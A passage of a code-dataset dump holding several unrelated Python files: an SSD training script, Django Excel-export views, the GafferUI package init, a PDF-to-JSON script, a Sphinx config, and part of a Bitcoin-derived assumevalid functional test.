We exclude the batch norm variables because\n # doing so leads to a small improvement in accuracy.\n total_loss = tf.add(cross_entropy + loc_loss, tf.multiply(params['weight_decay'], tf.add_n(l2_loss_vars), name='l2_loss'), name='total_loss')\n\n if mode == tf.estimator.ModeKeys.TRAIN:\n global_step = tf.train.get_or_create_global_step()\n lr_values = [params['learning_rate'] * decay for decay in params['lr_decay_factors']]\n learning_rate = tf.train.piecewise_constant(tf.cast(global_step, tf.int32),\n [int(_) for _ in params['decay_boundaries']],\n lr_values)\n truncated_learning_rate = tf.maximum(learning_rate, tf.constant(params['end_learning_rate'], dtype=learning_rate.dtype), name='learning_rate')\n # Create a tensor named learning_rate for logging purposes.\n tf.summary.scalar('learning_rate', truncated_learning_rate)\n optimizer = tf.train.MomentumOptimizer(learning_rate=truncated_learning_rate,\n momentum=params['momentum'])\n optimizer = tf.contrib.estimator.TowerOptimizer(optimizer)\n # Batch norm requires update_ops to be added as a train_op dependency.\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n train_op = optimizer.minimize(total_loss, global_step)\n else:\n train_op = None\n\n return tf.estimator.EstimatorSpec(\n mode=mode,\n predictions=predictions,\n loss=total_loss,\n train_op=train_op,\n eval_metric_ops=metrics,\n #scaffold=None)\n scaffold=tf.train.Scaffold(init_fn=get_init_fn()))\n\ndef parse_comma_list(args):\n return [float(s.strip()) for s in args.split(',')]\n\ndef main(_):\n os.environ['CUDA_VISIBLE_DEVICES'] = '4,5,6,7'\n #tf.set_pruning_mode()\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=FLAGS.gpu_memory_fraction)\n config = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False, intra_op_parallelism_threads=FLAGS.num_cpu_threads, inter_op_parallelism_threads=FLAGS.num_cpu_threads, gpu_options=gpu_options)\n num_gpus = validate_batch_size_for_multi_gpu(FLAGS.batch_size)\n\n run_config = tf.estimator.RunConfig().replace(\n save_checkpoints_secs=FLAGS.save_checkpoints_secs).replace(\n save_checkpoints_steps=None).replace(\n save_summary_steps=FLAGS.save_summary_steps).replace(\n keep_checkpoint_max=5).replace(\n tf_random_seed=FLAGS.tf_random_seed).replace(\n log_step_count_steps=FLAGS.log_every_n_steps).replace(\n session_config=config)\n\n replicate_ssd_model_fn = tf.contrib.estimator.replicate_model_fn(ssd_model_fn, loss_reduction=tf.losses.Reduction.MEAN)\n ssd_detector = tf.estimator.Estimator(\n model_fn=replicate_ssd_model_fn, model_dir=FLAGS.model_dir, config=run_config,\n params={\n 'num_gpus': num_gpus,\n 'data_format': FLAGS.data_format,\n 'batch_size': FLAGS.batch_size,\n 'model_scope': FLAGS.model_scope,\n 'num_classes': FLAGS.num_classes,\n 'negative_ratio': FLAGS.negative_ratio,\n 'match_threshold': FLAGS.match_threshold,\n 'neg_threshold': FLAGS.neg_threshold,\n 'weight_decay': FLAGS.weight_decay,\n 'momentum': FLAGS.momentum,\n 'learning_rate': FLAGS.learning_rate,\n 'end_learning_rate': FLAGS.end_learning_rate,\n 'decay_boundaries': parse_comma_list(FLAGS.decay_boundaries),\n 'lr_decay_factors': parse_comma_list(FLAGS.lr_decay_factors),\n })\n tensors_to_log = {\n 'lr': 'learning_rate',\n 'ce': 'cross_entropy_loss',\n 'loc': 'location_loss',\n 'loss': 'total_loss',\n 'l2': 'l2_loss',\n 'acc': 'post_forward/cls_accuracy',\n }\n logging_hook = tf.train.LoggingTensorHook(tensors=tensors_to_log, every_n_iter=FLAGS.log_every_n_steps,\n formatter=lambda dicts: (', 
'.join(['%s=%.6f' % (k, v) for k, v in dicts.items()])))\n print('Starting a training cycle.')\n ssd_detector.train(input_fn=input_pipeline(dataset_pattern='coco_2017_train-*', is_training=True, batch_size=FLAGS.batch_size),\n hooks=[logging_hook], max_steps=FLAGS.max_number_of_steps)\nif __name__ == '__main__':\n tf.logging.set_verbosity(tf.logging.INFO)\n tf.app.run()\n"} {"ext": "py", "sha": "1a2f9248def5cb5197b1f16ae85cb555e8aac1b1", "content": "from openpyxl import Workbook\nfrom django.http import HttpResponse\nfrom openpyxl.styles import Font,Alignment\nfrom .models import *\n\ndef export_wo_xls(request,wo_id):\n\tmy_wo = work_order.objects.all().filter(id=wo_id).first()\n\tresponse = HttpResponse(\n\t\tcontent_type='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',\n\t)\n\tresponse['Content-Disposition'] = f'attachment; filename={my_wo} Indents.xlsx'\n\tworkbook = Workbook()\n\n\t\n\t# Get active worksheet/tab\n\tworksheet = workbook.active\n\tworksheet.title = f'{my_wo} Indents'\n\n\t# Define the titles for columns\n\tcol_dict = {\n\t\t'Indent ID':'id',\n\t\t'Description':'description',\n\t\t'Material Type':'material_type',\n\t\t'Quantity':'quantity',\n\t\t'Weight':'get_weight',\n\t\t'Unit value':'value',\n\t\t'Tax (in %)':'tax',\n\t\t'Tax Value':'tax_amount',\n\t\t'Other Expanses':'other_expanses',\n\t\t'Discount':'discounted_total',\n\t\t'Gross Value':'gross_value',\n\t}\n\t\n\trow_num = 1\n\n\tall_indents = indent.objects.all().filter(WO=my_wo)\n\n\t# Assign the titles for each cell of the header\n\tfor col_num, column_title in enumerate(col_dict, 1):\n\t\tcell = worksheet.cell(row=row_num, column=col_num)\n\t\tcell.font = Font(name='Calibri', bold=True, size=12)\n\t\tcell.alignment=Alignment(horizontal='left')\n\t\tcell.value = column_title\n\n\n\t# Iterate through all movies\n\tfor my_indent in all_indents:\n\t\trow_num += 1\n\t\t# Define the data for each cell in the row \n\t\trow = []\n\t\tfor i in col_dict:\n\t\t\ttemp = getattr(my_indent, col_dict[i])\n\t\t\t# print(temp)\n\t\t\tif str(type(temp)) == \"\":\n\t\t\t\trow.append(temp())\n\t\t\telse:\n\t\t\t\trow.append(temp)\n\t\t\t\t# Assign the data for each cell of the row \n\t\tfor col_num, cell_value in enumerate(row, 1):\n\t\t\tcell = worksheet.cell(row=row_num, column=col_num)\n\t\t\tcell.alignment=Alignment(horizontal='left')\n\t\t\tcell.value = cell_value\n\n\tworkbook.save(response)\n\n\treturn response\n\ndef export_po_xls(request,po_id):\n\tmy_po = purchase_order.objects.all().filter(id=po_id).first()\n\tresponse = HttpResponse(\n\t\tcontent_type='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',\n\t)\n\tresponse['Content-Disposition'] = f'attachment; filename={my_po.po_number} Indents.xlsx'\n\tworkbook = Workbook()\n\n\t\n\t# Get active worksheet/tab\n\tworksheet = workbook.active\n\tworksheet.title = f'{my_po.po_number} Indents'\n\n\t# Define the titles for columns\n\tcol_dict = {\n\t\t'Indent ID':'id',\n\t\t'Description':'description',\n\t\t'Material Type':'material_type',\n\t\t'Quantity':'quantity',\n\t\t'Weight':'get_weight',\n\t\t'Unit value':'value',\n\t\t'Tax (in %)':'tax',\n\t\t'Tax Value':'tax_amount',\n\t\t'Other Expanses':'other_expanses',\n\t\t'Discount':'discounted_total',\n\t\t'Gross Value':'gross_value',\n\t}\n\t\n\trow_num = 1\n\n\tall_indents = indent.objects.all().filter(PO=my_po)\n\n\t# Assign the titles for each cell of the header\n\tfor col_num, column_title in enumerate(col_dict, 1):\n\t\tcell = worksheet.cell(row=row_num, column=col_num)\n\t\tcell.font = 
Font(name='Calibri', bold=True, size=12)\n\t\tcell.alignment=Alignment(horizontal='left')\n\t\tcell.value = column_title\n\n\n\t# Iterate through all movies\n\tfor my_indent in all_indents:\n\t\trow_num += 1\n\t\t# Define the data for each cell in the row \n\t\trow = []\n\t\tfor i in col_dict:\n\t\t\ttemp = getattr(my_indent, col_dict[i])\n\t\t\t# print(temp)\n\t\t\tif str(type(temp)) == \"\":\n\t\t\t\trow.append(temp())\n\t\t\telse:\n\t\t\t\trow.append(temp)\n\t\t\t\t# Assign the data for each cell of the row \n\t\tfor col_num, cell_value in enumerate(row, 1):\n\t\t\tcell = worksheet.cell(row=row_num, column=col_num)\n\t\t\tcell.alignment=Alignment(horizontal='left')\n\t\t\tcell.value = cell_value\n\n\tworkbook.save(response)\n\n\treturn response\n\n"} {"ext": "py", "sha": "1a2f9278bb9e4a8fb5bda1d5b89aa3b45d4a9b13", "content": "##########################################################################\n#\n# Copyright (c) 2011-2012, John Haddon. All rights reserved.\n# Copyright (c) 2011-2015, Image Engine Design Inc. All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n#\n# * Redistributions of source code must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer.\n#\n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided with\n# the distribution.\n#\n# * Neither the name of John Haddon nor the names of\n# any other contributors to this software may be used to endorse or\n# promote products derived from this software without specific prior\n# written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS\n# IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\n# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\n# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING\n# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n##########################################################################\n\n# Work around a bug which causes segfaults if uuid is imported after\n# PyQt. See here for details :\n#\n# https://bugs.gentoo.org/show_bug.cgi?id=317557\n# http://www.riverbankcomputing.com/pipermail/pyqt/2010-December/028773.html\n#\n# Using __import__ rather than import so that we don't pollute the GafferUI\n# namespace.\n__import__( \"uuid\" )\n\n##########################################################################\n# Function to return the C++ address of a wrapped Qt object. 
This can\n# be useful if needing to implement part of the UI in C++ and the rest\n# in Python.\n##########################################################################\n\ndef _qtAddress( o ) :\n\n\timport Qt\n\tif \"PyQt\" in Qt.__binding__ :\n\t\timport sip\n\t\treturn sip.unwrapinstance( o )\n\telse :\n\t\treturn __shiboken().getCppPointer( o )[0]\n\n##########################################################################\n# Function to return a wrapped Qt object from the given C++ address.\n# This can be useful if needing to implement part of the UI in C++ and\n# the rest in Python.\n##########################################################################\n\ndef _qtObject( address, type ) :\n\n\timport Qt\n\tif \"PyQt\" in Qt.__binding__ :\n\t\timport sip\n\t\treturn sip.wrapinstance( address, type )\n\telse :\n\t\treturn __shiboken().wrapInstance( address, type )\n\n##########################################################################\n# Determines if the wrapped Qt object is still valid\n# Useful when having to deal with the consequences of C++/Python deletion\n# order challeneges, see:\n# https://github.com/GafferHQ/gaffer/pull/3179\n##########################################################################\n\ndef _qtObjectIsValid( o ) :\n\n\timport Qt\n\tif \"PyQt\" in Qt.__binding__ :\n\t\timport sip\n\t\treturn not sip.isdeleted( o )\n\telse :\n\t\treturn __shiboken().isValid( o )\n\n##########################################################################\n# Shiboken lives in a variety of places depending on which PySide it is.\n##########################################################################\n\ndef __shiboken() :\n\n\timport Qt\n\tassert( \"PyQt\" not in Qt.__binding__ )\n\n\tif Qt.__binding__ == \"PySide2\" :\n\t\ttry :\n\t\t\timport PySide2.shiboken2 as shiboken\n\t\texcept ImportError :\n\t\t\timport shiboken2 as shiboken\n\telse :\n\t\ttry :\n\t\t\timport PySide.shiboken\n\t\texcept ImportError :\n\t\t\timport shiboken\n\n\treturn shiboken\n\n##########################################################################\n# now import our actual functionality\n##########################################################################\n\n# Import modules that must be imported before _GafferUI, using __import__\n# to avoid polluting the GafferUI namespace.\n__import__( \"IECore\" )\n__import__( \"Gaffer\" )\n\nfrom ._GafferUI import *\n\n# general ui stuff first\n\nfrom .Enums import *\nfrom .Widget import Widget\nfrom .LazyMethod import LazyMethod\nfrom .Menu import Menu\nfrom .ContainerWidget import ContainerWidget\nfrom .Window import Window\nfrom .SplitContainer import SplitContainer\nfrom .ListContainer import ListContainer\nfrom .GridContainer import GridContainer\nfrom .MenuBar import MenuBar\nfrom .EventLoop import EventLoop\nfrom .TabbedContainer import TabbedContainer\nfrom .TextWidget import TextWidget\nfrom .NumericWidget import NumericWidget\nfrom .Button import Button\nfrom .MultiLineTextWidget import MultiLineTextWidget\nfrom .Label import Label\nfrom .GLWidget import GLWidget\nfrom .ScrolledContainer import ScrolledContainer\nfrom .PathWidget import PathWidget\nfrom .PathListingWidget import PathListingWidget\nfrom .PathChooserWidget import PathChooserWidget\nfrom .Dialogue import Dialogue\nfrom .PathChooserDialogue import PathChooserDialogue\nfrom .TextInputDialogue import TextInputDialogue\nfrom .Collapsible import Collapsible\nfrom .ColorSwatch import ColorSwatch\nfrom .Slider import Slider\nfrom .ShowURL import showURL\nfrom .Spacer import 
Spacer\nfrom .BoolWidget import BoolWidget, CheckBox\nfrom .Image import Image\nfrom .ErrorDialogue import ErrorDialogue\nfrom ._Variant import _Variant\nfrom .VectorDataWidget import VectorDataWidget\nfrom .PathVectorDataWidget import PathVectorDataWidget\nfrom .ProgressBar import ProgressBar\nfrom .SelectionMenu import SelectionMenu\nfrom .PathFilterWidget import PathFilterWidget\nfrom .CompoundPathFilterWidget import CompoundPathFilterWidget\nfrom .InfoPathFilterWidget import InfoPathFilterWidget\nfrom .MatchPatternPathFilterWidget import MatchPatternPathFilterWidget\nfrom .FileSequencePathFilterWidget import FileSequencePathFilterWidget\nfrom .BusyWidget import BusyWidget\nfrom .NumericSlider import NumericSlider\nfrom .ColorChooser import ColorChooser\nfrom .ColorChooserDialogue import ColorChooserDialogue\nfrom .MessageWidget import MessageWidget, MessageSummaryWidget\nfrom .NotificationMessageHandler import NotificationMessageHandler\nfrom .MenuButton import MenuButton\nfrom .MultiSelectionMenu import MultiSelectionMenu\nfrom .PopupWindow import PopupWindow\nfrom .ConfirmationDialogue import ConfirmationDialogue\nfrom .DisplayTransform import DisplayTransform\nfrom .Divider import Divider\nfrom . import _Pointer\nfrom .SplineWidget import SplineWidget\nfrom .Bookmarks import Bookmarks\nfrom . import WidgetAlgo\n\n# then all the PathPreviewWidgets. note that the order\n# of import controls the order of display.\n\nfrom .PathPreviewWidget import PathPreviewWidget\nfrom .CompoundPathPreview import CompoundPathPreview\nfrom .DeferredPathPreview import DeferredPathPreview\nfrom .InfoPathPreview import InfoPathPreview\nfrom .HeaderPathPreview import HeaderPathPreview\nfrom .DataPathPreview import DataPathPreview\n\n# then stuff specific to graph uis\n\nfrom .BackgroundMethod import BackgroundMethod\nfrom .PlugValueWidget import PlugValueWidget\nfrom .StringPlugValueWidget import StringPlugValueWidget\nfrom .NumericPlugValueWidget import NumericPlugValueWidget\nfrom .BoolPlugValueWidget import BoolPlugValueWidget\nfrom .PathPlugValueWidget import PathPlugValueWidget\nfrom .FileSystemPathPlugValueWidget import FileSystemPathPlugValueWidget\nfrom .VectorDataPlugValueWidget import VectorDataPlugValueWidget\nfrom .PathVectorDataPlugValueWidget import PathVectorDataPlugValueWidget\nfrom .FileSystemPathVectorDataPlugValueWidget import FileSystemPathVectorDataPlugValueWidget\nfrom .PlugWidget import PlugWidget\nfrom .PlugLayout import PlugLayout\nfrom .Editor import Editor\nfrom .PythonEditor import PythonEditor\nfrom .GadgetWidget import GadgetWidget\nfrom .GraphEditor import GraphEditor\nfrom .ScriptWindow import ScriptWindow\nfrom .CompoundEditor import CompoundEditor\nfrom .NameWidget import NameWidget\nfrom .NameLabel import NameLabel\nfrom .NodeSetEditor import NodeSetEditor\nfrom .NodeEditor import NodeEditor\nfrom .Layouts import Layouts\nfrom .NodeMenu import NodeMenu\nfrom . import FileMenu\nfrom . import LayoutMenu\nfrom . import EditMenu\nfrom . import UserPlugs\nfrom .Frame import Frame\nfrom .CompoundNumericPlugValueWidget import CompoundNumericPlugValueWidget\nfrom .BoxPlugValueWidget import BoxPlugValueWidget\nfrom .NodeUI import NodeUI\nfrom .StandardNodeUI import StandardNodeUI\nfrom .NodeToolbar import NodeToolbar\nfrom .StandardNodeToolbar import StandardNodeToolbar\nfrom .Viewer import Viewer\nfrom .ColorSwatchPlugValueWidget import ColorSwatchPlugValueWidget\nfrom .ColorPlugValueWidget import ColorPlugValueWidget\nfrom .AboutWindow import AboutWindow\nfrom . 
import ApplicationMenu\nfrom .BrowserEditor import BrowserEditor\nfrom .Timeline import Timeline\nfrom .MultiLineStringPlugValueWidget import MultiLineStringPlugValueWidget\nfrom .PresetsPlugValueWidget import PresetsPlugValueWidget\nfrom .GraphComponentBrowserMode import GraphComponentBrowserMode\nfrom .ToolPlugValueWidget import ToolPlugValueWidget\nfrom .LabelPlugValueWidget import LabelPlugValueWidget\nfrom .CompoundDataPlugValueWidget import CompoundDataPlugValueWidget\nfrom .LayoutPlugValueWidget import LayoutPlugValueWidget\nfrom . import ScriptNodeUI\nfrom .RefreshPlugValueWidget import RefreshPlugValueWidget\nfrom . import PreferencesUI\nfrom .SplinePlugValueWidget import SplinePlugValueWidget\nfrom .RampPlugValueWidget import RampPlugValueWidget\nfrom .NodeFinderDialogue import NodeFinderDialogue\nfrom .ConnectionPlugValueWidget import ConnectionPlugValueWidget\nfrom .ButtonPlugValueWidget import ButtonPlugValueWidget\nfrom . import ViewUI\nfrom . import ToolUI\nfrom .Playback import Playback\nfrom . import MetadataWidget\nfrom .UIEditor import UIEditor\nfrom . import GraphBookmarksUI\nfrom . import DocumentationAlgo\nfrom . import _PlugAdder\nfrom .Backups import Backups\nfrom .AnimationEditor import AnimationEditor\nfrom . import CompoundNumericNoduleUI\nfrom . import Examples\nfrom .NameValuePlugValueWidget import NameValuePlugValueWidget\nfrom .ShufflePlugValueWidget import ShufflePlugValueWidget\nfrom .ShufflePlugValueWidget import ShufflesPlugValueWidget\n\n# and then specific node uis\n\nfrom . import DependencyNodeUI\nfrom . import ComputeNodeUI\nfrom . import RandomUI\nfrom . import SpreadsheetUI\nfrom . import ExpressionUI\nfrom . import BoxUI\nfrom . import ReferenceUI\nfrom . import BackdropUI\nfrom . import DotUI\nfrom . import SubGraphUI\nfrom . import SwitchUI\nfrom . import ContextProcessorUI\nfrom . import ContextVariablesUI\nfrom . import DeleteContextVariablesUI\nfrom . import TimeWarpUI\nfrom . import LoopUI\nfrom . import AnimationUI\nfrom . import BoxIOUI\nfrom . import BoxInUI\nfrom . import BoxOutUI\nfrom . import NameSwitchUI\nfrom . import EditScopeUI\n\n# backwards compatibility\n## \\todo Remove me\nMetadata = __import__( \"Gaffer\" ).Metadata\n\n__import__( \"IECore\" ).loadConfig( \"GAFFER_STARTUP_PATHS\", subdirectory = \"GafferUI\" )\n"} {"ext": "py", "sha": "1a2f9389e687aa056509a03a24247493b399b439", "content": "import pdf_to_json as p2j\n\nimport json\n\nurl = \"file:data/multilingual/Arab.URD/Serif_12/udhr_Arab.URD_Serif_12.pdf\"\nlConverter = p2j.pdf_to_json.pdf_to_json_converter()\nlConverter.mImageHashOnly = True\nlDict = lConverter.convert(url)\nprint(json.dumps(lDict, indent=4, ensure_ascii=False, sort_keys=True))\n"} {"ext": "py", "sha": "1a2f93a1abbf760f4bfdd75bbf26fa50bdde49ac", "content": "# -*- coding: utf-8 -*-\n#\n# python-bplsqlparse documentation build configuration file, created by\n# sphinx-quickstart on Thu Feb 26 08:19:28 2009.\n#\n# This file is execfile()d with the current directory set to its containing dir.\n#\n# Note that not all possible configuration values are present in this\n# autogenerated file.\n#\n# All configuration values have a default; values that are commented out\n# serve to show the default.\n\nimport datetime\nimport sys, os\n\n# If extensions (or modules to document with autodoc) are in another directory,\n# add these directories to sys.path here. 
If the directory is relative to the\n# documentation root, use os.path.abspath to make it absolute, like shown here.\n#sys.path.append(os.path.abspath('.'))\nsys.path.insert(0, os.path.join(os.path.dirname(__file__), '../../'))\n\nimport bplsqlparse\n\n# -- General configuration -----------------------------------------------------\n\n# Add any Sphinx extension module names here, as strings. They can be extensions\n# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.\nextensions = ['sphinx.ext.autodoc', 'sphinx.ext.todo', 'sphinx.ext.coverage',\n 'sphinx.ext.autosummary']\n\n# Add any paths that contain templates here, relative to this directory.\ntemplates_path = ['_templates']\n\n# The suffix of source filenames.\nsource_suffix = '.rst'\n\n# The encoding of source files.\n#source_encoding = 'utf-8'\n\n# The master toctree document.\nmaster_doc = 'index'\n\n# General information about the project.\nproject = 'python-bplsqlparse'\ncopyright = '{:%Y}, Andi Albrecht'.format(datetime.date.today())\n\n# The version info for the project you're documenting, acts as replacement for\n# |version| and |release|, also used in various other places throughout the\n# built documents.\n#\n# The short X.Y version.\nversion = bplsqlparse.__version__\n# The full version, including alpha/beta/rc tags.\nrelease = bplsqlparse.__version__\n\n# The language for content autogenerated by Sphinx. Refer to documentation\n# for a list of supported languages.\n#language = None\n\n# There are two options for replacing |today|: either, you set today to some\n# non-false value, then it is used:\n#today = ''\n# Else, today_fmt is used as the format for a strftime call.\n#today_fmt = '%B %d, %Y'\n\n# List of documents that shouldn't be included in the build.\n#unused_docs = []\n\n# List of directories, relative to source directory, that shouldn't be searched\n# for source files.\nexclude_trees = []\n\n# The reST default role (used for this markup: `text`) to use for all documents.\n#default_role = None\n\n# If true, '()' will be appended to :func: etc. cross-reference text.\n#add_function_parentheses = True\n\n# If true, the current module name will be prepended to all description\n# unit titles (such as .. function::).\n#add_module_names = True\n\n# If true, sectionauthor and moduleauthor directives will be shown in the\n# output. They are ignored by default.\n#show_authors = False\n\n# The name of the Pygments (syntax highlighting) style to use.\npygments_style = 'tango'\n\n# A list of ignored prefixes for module index sorting.\n#modindex_common_prefix = []\n\n\n# -- Options for HTML output ---------------------------------------------------\n\n# The theme to use for HTML and HTML Help pages. Major themes that come with\n# Sphinx are currently 'default' and 'sphinxdoc'.\n#html_theme = 'agogo'\n\n# Theme options are theme-specific and customize the look and feel of a theme\n# further. For a list of options available for each theme, see the\n# documentation.\n#html_theme_options = {}\n\n# Add any paths that contain custom themes here, relative to this directory.\n#html_theme_path = [os.path.abspath('../')]\n\n# The name for this set of Sphinx documents. If None, it defaults to\n# \" v documentation\".\n#html_title = None\n\n# A shorter title for the navigation bar. 
Default is the same as html_title.\n#html_short_title = None\n\n# The name of an image file (relative to this directory) to place at the top\n# of the sidebar.\n#html_logo = None\n\n# The name of an image file (within the static path) to use as favicon of the\n# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32\n# pixels large.\n#html_favicon = None\n\n# Add any paths that contain custom static files (such as style sheets) here,\n# relative to this directory. They are copied after the builtin static files,\n# so a file named \"default.css\" will overwrite the builtin \"default.css\".\n#html_static_path = ['_static']\n\n# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,\n# using the given strftime format.\n#html_last_updated_fmt = '%b %d, %Y'\n\n# If true, SmartyPants will be used to convert quotes and dashes to\n# typographically correct entities.\n#html_use_smartypants = True\n\n# Custom sidebar templates, maps document names to template names.\n#html_sidebars = {}\n\n# Additional templates that should be rendered to pages, maps page names to\n# template names.\n#html_additional_pages = {}\n\n# If false, no module index is generated.\n#html_use_modindex = True\n\n# If false, no index is generated.\n#html_use_index = True\n\n# If true, the index is split into individual pages for each letter.\n#html_split_index = False\n\n# If true, links to the reST sources are added to the pages.\n#html_show_sourcelink = True\n\n# If true, an OpenSearch description file will be output, and all pages will\n# contain a tag referring to it. The value of this option must be the\n# base URL from which the finished HTML is served.\n#html_use_opensearch = ''\n\n# If nonempty, this is the file name suffix for HTML files (e.g. \".xhtml\").\n#html_file_suffix = ''\n\n# Output file base name for HTML help builder.\nhtmlhelp_basename = 'python-sqlparsedoc'\n\n\n# -- Options for LaTeX output --------------------------------------------------\n\n# The paper size ('letter' or 'a4').\n#latex_paper_size = 'letter'\n\n# The font size ('10pt', '11pt' or '12pt').\n#latex_font_size = '10pt'\n\n# Grouping the document tree into LaTeX files. 
List of tuples\n# (source start file, target name, title, author, documentclass [howto/manual]).\nlatex_documents = [\n ('index', 'python-bplsqlparse.tex', 'python-bplsqlparse Documentation',\n 'Andi Albrecht', 'manual'),\n]\n\n# The name of an image file (relative to this directory) to place at the top of\n# the title page.\n#latex_logo = None\n\n# For \"manual\" documents, if this is true, then toplevel headings are parts,\n# not chapters.\n#latex_use_parts = False\n\n# Additional stuff for the LaTeX preamble.\n#latex_preamble = ''\n\n# Documents to append as an appendix to all manuals.\n#latex_appendices = []\n\n# If false, no module index is generated.\n#latex_use_modindex = True\ntodo_include_todos = True\n"} {"ext": "py", "sha": "1a2f945b414e7c4e58577b3059af0dc459d6abff", "content": "#!/usr/bin/env python3\n# Copyright (c) 2014-2016 The Bitcoinold Core developers\n# Distributed under the MIT software license, see the accompanying\n# file COPYING or http://www.opensource.org/licenses/mit-license.php.\n'''\nassumevalid.py\n\nTest logic for skipping signature validation on blocks which we've assumed\nvalid (https://github.com/bitcoinold/bitcoinold/pull/9484)\n\nWe build a chain that includes and invalid signature for one of the\ntransactions:\n\n 0: genesis block\n 1: block 1 with coinbase transaction output.\n 2-101: bury that block with 100 blocks so the coinbase transaction\n output can be spent\n 102: a block containing a transaction spending the coinbase\n transaction output. The transaction has an invalid signature. \n 103-2202: bury the bad block with just over two weeks' worth of blocks\n (2100 blocks)\n\nStart three nodes:\n\n - node0 has no -assumevalid parameter. Try to sync to block 2202. It will\n reject block 102 and only sync as far as block 101\n - node1 has -assumevalid set to the hash of block 102. Try to sync to\n block 2202. node1 will sync all the way to block 2202.\n - node2 has -assumevalid set to the hash of block 102. Try to sync to\n block 200. node2 will reject block 102 since it's assumed valid, but it\n isn't buried by at least two weeks' work.\n'''\n\nfrom test_framework.mininode import *\nfrom test_framework.test_framework import BitcoinoldTestFramework\nfrom test_framework.util import *\nfrom test_framework.blocktools import create_block, create_coinbase\nfrom test_framework.key import CECKey\nfrom test_framework.script import *\n\nclass BaseNode(SingleNodeConnCB):\n def __init__(self):\n SingleNodeConnCB.__init__(self)\n self.last_inv = None\n self.last_headers = None\n self.last_block = None\n self.last_getdata = None\n self.block_announced = False\n self.last_getheaders = None\n self.disconnected = False\n self.last_blockhash_announced = None\n\n def on_close(self, conn):\n self.disconnected = True\n\n def wait_for_disconnect(self, timeout=60):\n test_function = lambda: self.disconnected\n assert(wait_until(test_function, timeout=timeout))\n return\n\n def send_header_for_blocks(self, new_blocks):\n headers_message = msg_headers()\n headers_message.headers = [ CBlockHeader(b) for b in new_blocks ]\n self.send_message(headers_message)\n\nclass SendHeadersTest(BitcoinoldTestFramework):\n def __init__(self):\n super().__init__()\n self.setup_clean_chain = True\n self.num_nodes = 3\n\n def setup_network(self):\n # Start node0. 
We don't start the other nodes yet since\n # we need to pre-mine a block with an invalid transaction\n # signature so we can pass in the block hash as assumevalid.\n self.nodes = []\n self.nodes.append(start_node(0, self.options.tmpdir, [\"-debug\"]))\n\n def run_test(self):\n\n # Connect to node0\n node0 = BaseNode()\n connections = []\n connections.append(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], node0))\n node0.add_connection(connections[0])\n\n NetworkThread().start() # Start up network handling in another thread\n node0.wait_for_verack()\n\n # Build the blockchain\n self.tip = int(self.nodes[0].getbestblockhash(), 16)\n self.block_time = self.nodes[0].getblock(self.nodes[0].getbestblockhash())['time'] + 1\n\n self.blocks = []\n\n # Get a pubkey for the coinbase TXO\n coinbase_key = CECKey()\n coinbase_key.set_secretbytes(b\"horsebattery\")\n coinbase_pubkey = coinbase_key.get_pubkey()\n\n # Create the first block with a coinbase output to our key\n height = 1\n block = create_block(self.tip, create_coinbase(height, coinbase_pubkey), self.block_time)\n self.blocks.append(block)\n self.block_time += 1\n block.solve()\n # Save the coinbase for later\n self.block1 = block\n self.tip = block.sha256\n height += 1\n\n # Bury the block 100 deep so the coinbase output is spendable\n for i in range(100):\n block = create_block(self.tip, create_coinbase(height), self.block_time)\n block.solve()\n self.blocks.append(block)\n self.tip = block.sha256\n self.block_time += 1\n height += 1\n\n # Create a transaction spending the coinbase output with an invalid (null) signature\n tx = CTransaction()\n tx.vin.append(CTxIn(COutPoint(self.block1.vtx[0].sha256, 0), scriptSig=b\"\"))\n tx.vout.append(CTxOut(49*100000000, CScript([OP_TRUE])))\n tx.calc_sha256()\n\n block102 = create_block(self.tip, create_coinbase(height), self.block_time)\n self.block_time += 1\n block102.vtx.extend([tx])\n block102.hashMerkleRoot = block102.calc_merkle_root()\n block102.rehash()\n block102.solve()\n self.blocks.append(block102)\n self.tip = block102.sha256\n self.block_time += 1\n height += 1\n\n # Bury the assumed valid block 2100 deep\n for i in range(2100):\n block = create_block(self.tip, create_coinbase(height), self.block_time)\n block.nVersion = 4\n block.solve()\n self.blocks.append(block)\n self.tip = block.sha256\n self.block_time += 1\n height += 1\n\n # Start node1 and node2 with assumevalid so they accept a block with a bad signature.\n self.nodes.append(start_node(1, self.options.tmpdir,\n [\"-debug\", \"-assumevalid=\" + hex(block102.sha256)]))\n node1 = BaseNode() # connects to node1\n connections.append(NodeConn('127.0.0.1', p2p_port(1), self.nodes[1], node1))\n node1.add_connection(connections[1])\n node1.wait_for_verack()\n\n self.nodes.append(start_node(2, self.options.tmpdir,\n [\"-debug\", \"-assumevalid=\" + hex(block102.sha256)]))\n node2 = BaseNode() # connects to node2\n connections.append(NodeConn('127.0.0.1', p2p_port(2), self.nodes[2], node2))\n node2.add_connection(connections[2])\n node2.wait_for_verack()\n\n # send header 